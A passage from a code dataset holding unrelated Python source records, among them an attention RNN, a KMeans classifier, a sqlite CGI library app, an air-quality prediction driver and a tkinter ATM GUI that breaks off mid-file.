tree.close()\n if len(aCreated) == 1 and not documentType:\n tree = lastElement.getroottree()\n elif not documentType:\n aBefore = []\n rootElement = None\n aAfter = []\n for ePart in aCreated:\n if isinstance(ePart, etree._Comment) or isinstance(ePart, etree._ProcessingInstruction):\n if rootElement is None:\n aBefore.append(ePart)\n else:\n aAfter.append(ePart)\n else:\n assert isinstance(ePart, etree._Element)\n if rootElement is None:\n rootElement = ePart\n else:\n raise ValueError('XML document must have exactly one root element.')\n\n if rootElement is None:\n raise ValueError('XML document must have exactly one root element.')\n while aBefore:\n rootElement.addprevious(aBefore.pop())\n\n aAfter.reverse()\n while aAfter:\n rootElement.addnext(aAfter.pop())\n\n tree = rootElement.getroottree()\n else:\n aCreatedParts = [ etree.tostring(ePart) for ePart in aCreated ]\n if documentType:\n doctypePart = '<!DOCTYPE %s>' % documentType\n aCreatedParts = [doctypePart] + aCreatedParts\n tree = etree.fromstring(('').join(aCreatedParts)).getroottree()\n return (\n aVariables.encoding, tree)","sub_path":"pycfiles/compadre-1.0.34.tar/expand.py","file_name":"expand.py","file_ext":"py","file_size_in_byte":13347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"285956528","text":"import torch\nfrom torchtext import data, vocab\nimport matplotlib.ticker as ticker\nfrom collections import Counter\nimport pickle\nimport os\nimport numpy as np\nfrom fastai.text import *\nimport sys\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nimport networkx as nx\nfrom nltk.tokenize.punkt import PunktSentenceTokenizer\nfrom sklearn.feature_extraction.text import TfidfTransformer, CountVectorizer\nimport threading\nimport nltk\nfrom nltk.corpus import stopwords\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom fastai.nlp import *\nfrom fastai.model import Stepper\n\nclass AbstractiveRNN(nn.Module):\n\n def __init__(self, input_size, embz_size, hidden_size, batch_size, output_size, max_tgt_len, pre_trained_vector,\n padding_idx, encoder_drop=(0.0, 0.0), decoder_drop=(0.0, 0.0)):\n\n super().__init__()\n\n # initialize model parameters\n self.init_model_params(decoder_drop, embz_size, encoder_drop, hidden_size, 
input_size, max_tgt_len, output_size,\n padding_idx, pre_trained_vector)\n\n # encoder\n self.init_encoder()\n\n # decoder\n self.init_decoder()\n # set attention\n self.encoder_output_layer = nn.Linear(self.hidden_size * 1, self.embz_size)\n self.init_attn()\n\n def init_model_params(self, decoder_drop, embz_size, encoder_drop, hidden_size, input_size, max_tgt_len,\n output_size, padding_idx, pre_trained_vector):\n self.output_size, self.embz_size, self.hidden_size = output_size, embz_size, hidden_size // 2\n self.input_size, self.max_tgt_len, self.pre_trained_vector = input_size, max_tgt_len, pre_trained_vector\n self.encoder_drop, self.decoder_drop, self.padding_idx = encoder_drop, decoder_drop, padding_idx\n\n def init_attn(self):\n self.att_vector_layer = nn.Linear(self.embz_size + self.embz_size, self.embz_size)\n\n def init_decoder(self):\n self.decoder_dropout = nn.Dropout(self.decoder_drop[0])\n self.decoder_embedding_layer = nn.Embedding(self.input_size, self.embz_size, padding_idx=self.padding_idx)\n self.decoder_rnn = nn.LSTM(\n input_size=self.embz_size,\n hidden_size=self.hidden_size,\n num_layers=1,\n dropout=self.decoder_drop[1])\n self.decoder_output_layer = nn.Linear(self.hidden_size, self.embz_size)\n self.output_layer = nn.Linear(self.embz_size, self.output_size)\n self.decoder_embedding_layer.weight = self.encoder_embedding_layer.weight\n self.output_layer.weight = self.decoder_embedding_layer.weight\n\n def init_encoder(self):\n self.encoder_dropout = nn.Dropout(self.encoder_drop[0])\n self.encoder_embedding_layer = nn.Embedding(self.input_size, self.embz_size, padding_idx=self.padding_idx)\n self.encoder_embedding_layer.weight.data.copy_(self.pre_trained_vector.weight.data)\n self.encoder_rnn = nn.LSTM(\n input_size=self.embz_size,\n hidden_size=self.hidden_size,\n num_layers=1,\n dropout=self.encoder_drop[1])\n self.encoder_vector_layer = nn.Linear(self.hidden_size, self.embz_size)\n\n def init_hidden(self, batch_size):\n return (V(torch.zeros(1, batch_size, self.hidden_size)),\n V(torch.zeros(1, batch_size, self.hidden_size)))\n\n def store_path(self, hidden):\n def _cat(h):\n return torch.cat([h[0:h.size(0):2], h[1:h.size(0):2]], 2)\n\n hidden = tuple([_cat(h) for h in hidden])\n return hidden\n\n def attn(self, encoder_output, decoder_output):\n encoder_output = self.encoder_output_layer(encoder_output)\n encoder_output = encoder_output.transpose(0, 1)\n decoder_output = decoder_output.transpose(0, 1)\n att_score = torch.bmm(encoder_output, decoder_output.transpose(-1, 1))\n att_weight = F.softmax(att_score, dim=1)\n context_vector = torch.bmm(att_weight.transpose(-1, 1), encoder_output).squeeze(1)\n att_vector = torch.cat((context_vector, decoder_output.squeeze(1)), dim=1)\n att_vector = self.att_vector_layer(att_vector)\n att_vector = F.tanh(att_vector)\n return att_weight.squeeze(-1), att_vector\n\n def decoder_forward(self, batch_size, encoder_output, decoder_hidden, y=None):\n decoder_input = V(torch.zeros(batch_size).long())\n output_seq_stack, att_stack = [], []\n output_seq_stack, att_stack = self.process_decoder_forward(att_stack, decoder_hidden, decoder_input,\n encoder_output, output_seq_stack, y)\n\n return torch.stack(output_seq_stack), torch.stack(att_stack)\n\n def process_decoder_forward(self, att_stack, decoder_hidden, decoder_input, encoder_output, output_seq_stack, y):\n for i in range(self.max_tgt_len):\n decoder_input = self.decoder_dropout(self.decoder_embedding_layer(decoder_input))\n decoder_output, decoder_hidden = 
self.decoder_rnn(decoder_input.unsqueeze(0), decoder_hidden)\n decoder_output = self.decoder_output_layer(decoder_output)\n att, decoder_output = self.attn(encoder_output, decoder_output)\n att_stack.append(att)\n output = self.output_layer(decoder_output)\n output_seq_stack.append(output)\n decoder_input = V(output.data.max(1)[1])\n if (decoder_input == 1).all(): break\n samp_prob = round(random.random(), 1)\n if (y is not None) and (samp_prob < 1):\n if i >= len(y): break\n decoder_input = y[i]\n return output_seq_stack, att_stack\n\n def forward(self, seq, y=None):\n batch_size = seq[0].size(0)\n encoder_hidden = self.init_hidden(batch_size)\n encoder_input = self.encoder_dropout(self.encoder_embedding_layer(seq))\n encoder_output, encoder_hidden = self.encoder_rnn(encoder_input, encoder_hidden)\n encoder_hidden = self.store_path(encoder_hidden)\n output = self.decoder_forward(batch_size, encoder_output, encoder_hidden, y=y)\n encoder_vector = self.encoder_vector_layer(encoder_hidden[0][-1])\n output = output + (encoder_vector,)\n return output\n","sub_path":"Final_Project/absctrative_rnn.py","file_name":"absctrative_rnn.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"389255812","text":"from PythonASTExtension import *\nfrom AssemblyAST import *\nimport copy\n\nclass MemoryAssignment:\n\t\n\tdef __init__(self,coloredGraph):\n\t\tself.memory = {}\n\t\tself.coloredGraph = coloredGraph\n\n\tdef assignMemoryLocationMap(self,ast):\n\t\tif isinstance(ast,AssName) or isinstance(ast,Name):\n\t\t\tif ast.name not in self.memory: self.memory[ast.name] = MemoryOperand(Registers32.EBP,-4*(len(self.memory)+1))\n\t\t\tast.memory = self.memory[ast.name]\n\t\t\treturn ast\n\t\telif isinstance(ast,Function):\n\t\t\tast.memory = copy.deepcopy(self.memory)\n\t\t\tself.memory = {}\n\t\t\treturn ast\n\t\telse: return ast;\n\n","sub_path":"MemoryAssignment.py","file_name":"MemoryAssignment.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"344209100","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.cluster import KMeans\nfrom collections import Counter\nfrom sklearn import metrics\n\nclass K_Means:\n def run(self, name, x_train, x_test, y_train, y_test, k=5):\n myset = set(y_train) # Create a set. Sets hold no duplicates, so this set keeps exactly one of each label, e.g. [1,2,3]\n clusters = len(myset) # How many clusters KMeans will use\n\n model = KMeans(n_clusters = clusters)\n model = model.fit(x_train)\n\n # Get the labels of the training patterns\n labels = model.labels_\n\n map_labels = []\n\n for i in range(clusters):\n map_labels.append([])\n\n new_y_train = list(y_train)\n\n for i in range(len(y_train)):\n for c in range(clusters):\n if labels[i] == c:\n map_labels[c].append(new_y_train[i])\n\n # print(map_labels)\n\n # Build a dictionary with the labels to be mapped\n mapping = {}\n\n for i in range(clusters):\n final = Counter(map_labels[i]) # count which class appears most often\n value = final.most_common(1)[0][0] # returns the most frequent class\n mapping[i] = value\n\n # print(mapping)\n\n result = model.predict(x_test)\n result = [mapping[i] for i in result]\n\n acc = metrics.accuracy_score(result, y_test)\n show = round(acc * 100)\n\n # # Printing results\n # print(f'\\nK Means - {name} =======================================================================')\n # print(f'The accuracy is {show} %')\n # print(f'{list(result)}')\n # print(f'{list(y_test)}')\n\n dic = {\n \"result\": result,\n \"acc\": acc,\n \"show\": show\n }\n\n return dic","sub_path":"Topicos/Projeto-final/Algoritmos/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"364213995","text":"from .Guests import *\r\nfrom .Registered import *\r\nfrom .filetpl import loadTpl\r\nimport pickle, cgi, cgitb, codecs, sys, os\r\ncgitb.enable()\r\nimport sqlite3\r\n\r\nclass Library:\r\n def __init__(self, q, selfurl, db):\r\n self.q = q\r\n self.selfurl = selfurl\r\n self.l = list()\r\n self.id_count = 0\r\n self.db = db\r\n self.libf()\r\n\r\n def libf(self):\r\n self.db.row_factory = sqlite3.Row\r\n self.dbc = self.db.cursor()\r\n self.dbc.execute('create table if not exists lib(id_count integer primary key autoincrement, number text, name text, surname text)')\r\n self.db.commit()\r\n\r\n def showForm(self):\r\n print (loadTpl('menu').format(self.selfurl, self.q.getvalue('student')))\r\n self.dbc.execute('select * from lib')\r\n# self.db.commit()\r\n for item in self.dbc.fetchall():\r\n if item['number'] is None:\r\n ob = Guest(self.q, self.selfurl)\r\n else:\r\n ob = Registered(self.q, self.selfurl)\r\n ob.readDb(item)\r\n ob.show()\r\n print ('')\r\n \r\n def addGuest(self):\r\n guest = Guest(self.q, self.selfurl)\r\n guest.add()\r\n \r\n def addReg(self):\r\n reg = Registered(self.q, self.selfurl)\r\n reg.add()\r\n \r\n def edit_student(self):\r\n iid = self.q.getvalue('id')\r\n self.dbc.execute('SELECT * FROM lib WHERE id_count=?', (iid,))\r\n# self.db.commit()\r\n data = self.dbc.fetchone()\r\n if data['number'] is None:\r\n obj = Guest(self.q, self.selfurl)\r\n else:\r\n obj = Registered(self.q, self.selfurl)\r\n obj.readDb(data)\r\n obj.edit() \r\n\r\n def save_student(self):\r\n if self.q.getvalue('obj') == '1':\r\n obj = Guest(self.q, self.selfurl)\r\n if self.q.getvalue('obj') == '2':\r\n obj = Registered(self.q, self.selfurl)\r\n obj.save()\r\n obj.saveDb(self.db)\r\n# self.db.commit()\r\n self.showForm()\r\n\r\n def delete(self):\r\n iid = self.q.getvalue('id')\r\n self.dbc.execute('delete from lib where id_count=?', (iid,))\r\n# self.db.commit()\r\n self.showForm()\r\n\r\n def clear(self):\r\n self.clearAll()\r\n self.showForm()\r\n\r\n def clearAll(self):\r\n 
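# delete every row in lib and reset its AUTOINCREMENT counter so new ids start from 1 again\r\n 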
self.db.executescript(\"\"\"\r\n delete from lib;\r\n delete from SQLITE_SEQUENCE where name='lib';\r\n \"\"\")\r\n self.db.commit()\r\n\r\n def import_file(self):\r\n if (os.path.exists('cgi-bin/st02/file.db')):\r\n self.clearAll()\r\n with open('cgi-bin/st02/file.db', 'rb') as f:\r\n self.l = pickle.load(f)\r\n for item in self.l:\r\n item.id = -1\r\n item.saveDb(self.db)\r\n self.db.commit()\r\n self.showForm()\r\n","sub_path":"cgi-bin/st02/Library.py","file_name":"Library.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"470021997","text":"\nimport os\nimport pandas\nimport numpy as np\nfrom pandas.core.series import Series\n\n\ndef parse_metadata(movie_id):\n fname = 'metadata/{}.txt'.format(movie_id)\n with open(fname, 'rb') as mfile:\n lines = mfile.readlines() \n if len(lines) < 2: return pandas.DataFrame()\n\n genres = lines[1].split('\\t')\n if len(genres) < 2: return pandas.DataFrame()\n\n genres = [s.strip() for s in genres][1:]\n data = pandas.DataFrame({'movie': np.repeat(movie_id, len(genres)), 'genre': genres})\n return data\n\n\ndef main():\n\n movies_df = pandas.DataFrame()\n metadata_dir = 'metadata/'\n for f in os.listdir(metadata_dir):\n if f.endswith(\".txt\"):\n movie_id, ext = tuple(f.split('.'))\n df = parse_metadata(movie_id)\n movies_df = movies_df.append(df)\n\n movies_df['count'] = 1\n movies_df = movies_df.pivot(index='movie', columns='genre', values='count').fillna('0')\n movies_df = movies_df.astype(int)\n movies_df.to_csv('output/movie_genres.csv')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"read_metadata.py","file_name":"read_metadata.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"18577539","text":"# Made by Ronald van Egdom.\r\n# For HKU Creative Programming with Python.\r\n# Lab 2.\r\n\r\n# Importing the GenericObject class.\r\nfrom GenericObject import GenericObject\r\nint_border = 0 # Minimum object distance from edge of the screen.\r\n\r\n# Object Creation.\r\n# Width, Height, X, Y, Border, Speed, Going Left, Going Right, Shape.\r\nobject_1 = GenericObject(50,50,int_border+250,int_border,int_border,5,False,False,\"rectangle\") # First Object\r\nobject_2 = GenericObject(100,100,int_border,int_border+250,int_border,10,False,False,\"ellipse\") # Second Object\r\n \r\ndef setup(): # Defining parameters that run once.\r\n size(1000,700) # Screen size.\r\n background(50) # A gray background.\r\n noStroke()\r\n GenericObject.setupGenericObject()\r\n \r\ndef draw(): # Continually runs as long as the program runs.\r\n background(50) # Cleaning the screen from previous draws.\r\n GenericObject.update(object_1)\r\n GenericObject.update(object_2)","sub_path":"Lab 2/Moving_Objects_With_Array_and_Method/Moving_Objects_With_Method_and_Class/Moving_Objects_With_Method_and_Class.pyde","file_name":"Moving_Objects_With_Method_and_Class.pyde","file_ext":"pyde","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"276326391","text":"from argparse import ArgumentParser\n\n# python palindrome_check.py -text asddsa\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('-text', type=str, required=True, help='Text to check')\n args = parser.parse_args()\n\n print(args.text == 
args.text[::-1])\n","sub_path":"palindrome_check.py","file_name":"palindrome_check.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"594971540","text":"#!/usr/bin/python\n# -*- codding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import write_two_parameter\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/license-manager/create-grant-version.html\nif __name__ == '__main__':\n \"\"\"\n\n \"\"\"\n\n parameter_display_string = \"\"\"\n # client-token : Unique, case-sensitive identifier that you provide to ensure the idempotency of the request.\n # grant-arn : Amazon Resource Name (ARN) of the grant.\n \"\"\"\n add_option_dict = {}\n add_option_dict[\"parameter_display_string\"] = parameter_display_string\n # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n write_two_parameter(\"license-manager\", \"create-grant-version\", \"client-token\", \"grant-arn\", add_option_dict)\n","sub_path":"license-manager_write_2/grant-version_create.py","file_name":"grant-version_create.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"19949210","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Product',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('name', models.CharField(blank=True, null=True, max_length=255)),\n ('product_type', models.CharField(blank=True, null=True, max_length=30)),\n ('price', models.FloatField(blank=True, default=0.0, null=True)),\n ('landing_url', models.URLField(blank=True, null=True)),\n ('image', models.URLField(blank=True, null=True)),\n ('description', models.CharField(blank=True, null=True, max_length=255)),\n ('scraped_date', models.DateTimeField(auto_now=True)),\n ],\n ),\n ]\n","sub_path":"apps/home/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"30039951","text":"from tokenization.crf_tokenizer import CrfTokenizer\nfrom word_embedding.word2vec_gensim import Word2Vec\nfrom text_classification.short_text_classifiers import BiDirectionalLSTMClassifier, load_synonym_dict\n# Please give the correct paths\n# Load word2vec model from file. 
If you want to train your own model, please go to README or check word2vec_gensim.py\nword2vec_model = Word2Vec.load('models/pretrained_word2vec.bin')\n\ntokenizer = CrfTokenizer(config_root_path='tokenization/',\n model_path='models/pretrained_tokenizer.crfsuite')\nsym_dict = load_synonym_dict('data/sentiment/synonym.txt')\nkeras_text_classifier = BiDirectionalLSTMClassifier(tokenizer=tokenizer, word2vec=word2vec_model.wv,\n model_path='models/app.h5',\n max_length=10, n_epochs=10,\n sym_dict=sym_dict, n_class=3)\n# Load and prepare data\nX, y = keras_text_classifier.load_data()\n\n# Train your classifier and test the model\nkeras_text_classifier.train(X, y)\nlabel_dict = {0: 'mo_vnexpress', 1: 'mo_dantri', 2: 'mo_truyenfull'}\ntest_sentences = ['vnexpress come', 'dân trí lên', 'truyện đê', 'vnexpress chế']\nlabels = keras_text_classifier.classify(test_sentences, label_dict=label_dict)\nprint(labels)\n\n\n\n","sub_path":"TroLyAo.py","file_name":"TroLyAo.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"586856331","text":"import datetime\r\nimport sys\r\nimport csv\r\nimport time\r\nfrom Time_Series_Models.prophet_model import prophet_prediction\r\nfrom Time_Series_Models.ARIMA_model import arima_prediction\r\n\"\"\"\r\n.. module:: AIRPrediction\r\n :synopsis: The driver file that is to be imported to utilize the AIRPrediction Framework.\r\n Includes a function for input validation, prophet predictions, ARIMA predictions, and comparison of the two models.\r\n.. moduleauthors:: Derek Pena , Colin Naehr , Daniel Casto , \r\n Haotian Wang \r\n\"\"\"\r\n\r\n\r\ndef validate_input(pollutant, state, county, city, date):\r\n \"\"\" Validates the input provided by a user. To be used before any predictions are made.\r\n :param pollutant: The specified pollutant to predict (NO2, O3, SO2, CO).\r\n :param state: The location parameter indicating the state in the United States of America to predict for.\r\n :param county: The location parameter indicating the county in the state to predict for.\r\n :param city: The location parameter indicating the city in the county to predict for.\r\n :param date: The calendar date to predict for.\r\n :return: A boolean that indicates whether validation was successful, a string that contains any error messages,\r\n and a string that rewrites the date parameter in YYYY-MM-DD format.\r\n \"\"\"\r\n validate = True\r\n return_message = \"\"\r\n valid_pollutants = ['NO2', 'O3', 'SO2', 'CO']\r\n entered_datetime = \"\"\r\n if pollutant == \"\" or state == \"\" or county == \"\" or city == \"\" or date == \"\":\r\n return False, \"Error: One or more fields left blank. 
Please fill out all fields.\", entered_datetime\r\n\r\n if pollutant not in valid_pollutants:\r\n validate = False\r\n return_message = \"Error: Invalid Pollutant.\"\r\n else:\r\n if len(date) == 10:\r\n if date[2] != '/' or date[5] != '/':\r\n validate = False\r\n return_message = \"Error: Invalid Date Format.\"\r\n\r\n month = date[:2]\r\n day = date[3:5]\r\n year = date[6:]\r\n\r\n entered_datetime = datetime.datetime(int(year), int(month), int(day))\r\n\r\n current_date = datetime.date.today().strftime('%m/%d/%Y')\r\n current_month = current_date[:2]\r\n current_day = current_date[3:5]\r\n current_year = current_date[6:]\r\n current_datetime = datetime.datetime(int(current_year), int(current_month), int(current_day))\r\n\r\n if entered_datetime > current_datetime:\r\n validate = True\r\n month_string = str(entered_datetime.month)\r\n day_string = str(entered_datetime.day)\r\n if len(month_string) == 1:\r\n month_string = '0' + month_string\r\n if len(day_string) == 1:\r\n day_string = '0' + day_string\r\n entered_datetime = str(entered_datetime.year) + '-' + month_string + '-' + day_string\r\n\r\n with open(\"data/predictable_areas.csv\") as file:\r\n location_validator = csv.reader(file)\r\n location_validation = False\r\n state_validation = False\r\n county_validation = False\r\n city_validation = False\r\n for row in location_validator:\r\n if row[0] == state:\r\n state_validation = True\r\n if row[1] == county and row[2] == city:\r\n location_validation = True\r\n if row[1] == county:\r\n county_validation = True\r\n if row[2] == city:\r\n city_validation = True\r\n if not location_validation:\r\n validate = False\r\n if state_validation and county_validation and city_validation:\r\n return_message = \"Error: State, county, and city found. However, the combination of those parameters was not found in the dataset.\"\r\n else:\r\n return_message = \"Error: Following location parameters not found in the dataset:\"\r\n if not state_validation:\r\n return_message += \" State,\"\r\n if not county_validation:\r\n return_message += \" County,\"\r\n if not city_validation:\r\n return_message += \" City.\"\r\n if return_message[len(return_message) - 1] == \",\":\r\n return_message = return_message[0:(len(return_message) - 1)]\r\n return_message += \".\"\r\n else:\r\n validate = False\r\n return_message = \"Error: Invalid Date. 
Entered date must occur after current date.\"\r\n else:\r\n validate = False\r\n return_message = \"Error: Invalid Date Format.\"\r\n return validate, return_message, entered_datetime\r\n\r\n\r\ndef prophet(pollutant, state, county, city, date):\r\n \"\"\" A function that uses the prophet_prediction from prophet_model.py to avoid using multiple import statements.\r\n :param pollutant: The specified pollutant to predict (NO2, O3, SO2, CO).\r\n :param state: The location parameter indicating the state in the United States of America to predict for.\r\n :param county: The location parameter indicating the county in the state to predict for.\r\n :param city: The location parameter indicating the city in the county to predict for.\r\n :param date: The calendar date to predict for.\r\n :return: The prediction made by the prophet model given the above parameters and the units that prediction is in.\r\n \"\"\"\r\n return prophet_prediction(pollutant, state, county, city, date)\r\n\r\n\r\ndef arima(pollutant, state, county, city, date):\r\n \"\"\" A function that uses the arima_prediction from ARIMA_model.py to avoid using multiple import statements.\r\n :param pollutant: The specified pollutant to predict (NO2, O3, SO2, CO).\r\n :param state: The location parameter indicating the state in the United States of America to predict for.\r\n :param county: The location parameter indicating the county in the state to predict for.\r\n :param city: The location parameter indicating the city in the county to predict for.\r\n :param date: The calendar date to predict for.\r\n :return: The prediction made by the ARIMA model given the above parameters and the units that prediction is in.\r\n \"\"\"\r\n return arima_prediction(pollutant, state, county, city, date)\r\n\r\n\r\ndef compare_models(pollutant, state, county, city, date):\r\n \"\"\" compare_models is a function that times both prediction models in order to compare their speed and their output.\r\n\r\n :param pollutant: The specified pollutant to predict (NO2, O3, SO2, CO).\r\n :param state: The location parameter indicating the state in the United States of America to predict for.\r\n :param county: The location parameter indicating the county in the state to predict for.\r\n :param city: The location parameter indicating the city in the county to predict for.\r\n :param date: The calendar date to predict for.\r\n :return: A list that contains the outputs for each prediction model as well as the time taken to run them.\r\n \"\"\"\r\n output_list = []\r\n start_one = time.time()\r\n prediction, units = prophet_prediction(pollutant, state, county, city, date)\r\n end_one = time.time()\r\n output_list.append(prediction)\r\n output_list.append(units)\r\n output_list.append(end_one - start_one)\r\n start_two = time.time()\r\n prediction, units = arima_prediction(pollutant, state, county, city, date)\r\n end_two = time.time()\r\n output_list.append(prediction)\r\n output_list.append(units)\r\n output_list.append(end_two - start_two)\r\n return output_list\r\n","sub_path":"AIRPrediction.py","file_name":"AIRPrediction.py","file_ext":"py","file_size_in_byte":8469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"646254470","text":"class Node:\n\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\n\nclass LinkedList:\n \n def __init__(self):\n self.root = None\n \n def add(self, data):\n new_node = Node(data,self.root)\n self.root = new_node\n \n def __str__(self):\n if not self.root:\n return 'LinkedList ([])'\n else:\n curr = self.root\n out = 'LinkedList ([{}, '.format(str(curr.data))\n while curr.next:\n curr = curr.next\n out += '{}, '.format(str(curr.data))\n return out[:-2] + '])'\n\n\n @staticmethod\n def from_list(l): \n ll = LinkedList()\n for i in l[::-1]:\n ll.add(i)\n return ll\n\n\ndef rearrange(llist):\n '''\n >>> for i in range(6):\n ... ll = LinkedList.from_list(range(i))\n ... print ll, '->',\n ... print rearrange(ll)\n LinkedList ([]) -> LinkedList ([])\n LinkedList ([0]) -> LinkedList ([0])\n LinkedList ([0, 1]) -> LinkedList ([0, 1])\n LinkedList ([0, 1, 2]) -> LinkedList ([0, 2, 1])\n LinkedList ([0, 1, 2, 3]) -> LinkedList ([0, 3, 1, 2])\n LinkedList ([0, 1, 2, 3, 4]) -> LinkedList ([0, 4, 1, 3, 2])\n '''\n if llist.root is None:\n return llist\n first = llist.root\n while True:\n second = first.next\n curr = first\n if not second or not second.next:\n break\n while curr.next:\n prev,curr = curr,curr.next\n prev.next = None\n first.next = curr\n first = curr.next = second \n return llist\n \nif __name__ == \"__main__\":\n import doctest\n doctest.testmod(verbose=True)\n\n\n","sub_path":"test_4.py","file_name":"test_4.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"70078478","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom __future__ import absolute_import\n\nimport oneflow as flow\n\n\ndef conv2d_layer(\n name,\n input,\n filters,\n kernel_size=3,\n strides=1,\n padding=\"SAME\",\n data_format=\"NCHW\",\n dilation_rate=1,\n activation=\"Relu\",\n use_bias=True,\n weight_initializer=flow.random_uniform_initializer(),\n bias_initializer=flow.constant_initializer(),\n):\n weight_shape = (filters, input.shape[1], kernel_size, kernel_size)\n weight = flow.get_variable(\n name + \"-weight\",\n shape=weight_shape,\n dtype=input.dtype,\n initializer=weight_initializer,\n )\n output = flow.nn.conv2d(\n input, weight, strides, padding, data_format, dilation_rate, name=name\n )\n if use_bias:\n bias = flow.get_variable(\n name + \"-bias\",\n shape=(filters,),\n dtype=input.dtype,\n initializer=bias_initializer,\n )\n output = flow.nn.bias_add(output, bias, data_format)\n\n if activation is not None:\n if activation == \"Relu\":\n output = flow.math.relu(output)\n else:\n raise NotImplementedError\n\n return output\n","sub_path":"oneflow/python/benchmarks/cnn_benchmark/model_util.py","file_name":"model_util.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"453539488","text":"\n#\nfrom .... import global_var\n\n\ndef power(ax,\n df,\n map_code = None,\n load_nature = None,\n load_unit = None,\n **kwargs,\n ):\n \"\"\"\n Draws in a subplot the load data.\n \n :param ax: The ax to fill\n :param df: The load data\n :param map_code: The delivery zone\n :param load_nature: The nature of the data to plot\n :param kwargs: additional parameter for the plt.plot function\n :type ax: matplotlib.axes._subplots.AxesSubplot\n :type df: pd.DataFrame\n :type map_code: string\n :type load_nature: string\n :type kwargs: dict\n :return: None\n :rtype: None\n \"\"\" \n \n # dg = df.xs((map_code,\n # load_nature,\n # ),\n # level = (global_var.geography_map_code,\n # global_var.load_nature,\n # ),\n # axis = 1,\n # )\n dg = df.loc[ (df[global_var.geography_map_code] == map_code)\n & (df[global_var.load_nature] == load_nature)\n ]\n \n dg = dg.dropna()\n ax.plot(dg.index,\n dg[load_unit],\n **kwargs,\n )\n","sub_path":"pub_data_visualization/load/plot/subplot/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"21533262","text":"\n\nimport lab4\nfrom tkinter import *\n\nclass Application(Frame):\n def __init__(self, master):\n Frame.__init__(self, master)\n self.grid()\n self.create_widgets()\n\n # ---------- THIS IS WHERE ALL THE GUI ITEMS ARE CREATED ---------\n def create_widgets(self):\n # create a label and entry for name\n Label(self,\n text=\"Name:\"\n ).grid(row=0, column=0, sticky=W)\n self.name_ent = Entry(self)\n self.name_ent.grid(row=0, column=1, sticky=W)\n\n # create a label and entry for name\n Label(self,\n text=\"PIN code:\"\n ).grid(row=2, column=0, sticky=W)\n self.pin_ent = Entry(self)\n self.pin_ent.grid(row=2, column=1, sticky=W)\n\n Label(self,\n text=\"Amount:\"\n ).grid(row=3, column=0, sticky=W)\n self.amount_ent = Entry(self)\n self.amount_ent.grid(row=3, column=1, sticky=W)\n\n # create VIP check button\n self.is_vip = BooleanVar()\n Checkbutton(self,\n text=\"Person is a VIP\",\n variable=self.is_vip\n ).grid(row=1, column=1, sticky=W)\n\n # create buttons for for adding persons and running simulator\n self.bttn_add = Button(self,\n text=\"Create Account\",\n command=self.bttn_create_account)\n self.bttn_add.grid(row=0, column=2, sticky=W)\n\n self.bttn_sim = Button(self,\n text=\"Withdrawal\",\n command=self.bttn_withdrawal)\n self.bttn_sim.grid(row=1, column=2, sticky=W)\n\n self.bttn_dep = Button(self,\n text=\"Deposit\",\n command=self.bttn_deposit)\n self.bttn_dep.grid(row=2, column=2, sticky=W)\n\n self.bttn_chPIN = Button(self,\n text=\"Change PIN\",\n command=self.bttn_change_PIN)\n 